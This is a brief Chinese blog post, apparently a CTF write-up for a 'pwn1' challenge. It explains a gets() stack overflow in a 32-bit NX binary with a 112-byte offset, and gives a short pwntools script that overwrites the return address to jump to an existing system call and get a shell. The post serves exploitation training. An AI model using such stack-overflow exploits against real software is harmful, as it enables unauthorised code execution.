您的位置: 首页 > 文章 > pwn1第一关 pwn1第一关 分类: 文章 • 2022-10-07 22:57:07 检查程序,发现是32位,开了NX保护拖入ida32get()存在溢出,gdb调试偏移112字节后覆盖返回地址,程序本身有调用system函数, exp如下: from pwn import * p=process('./pwn1') payload='a'*112+p32(0x0804863A) p.recvline() p.sendline(payload) p.interactive() 成功拿到shell题目地址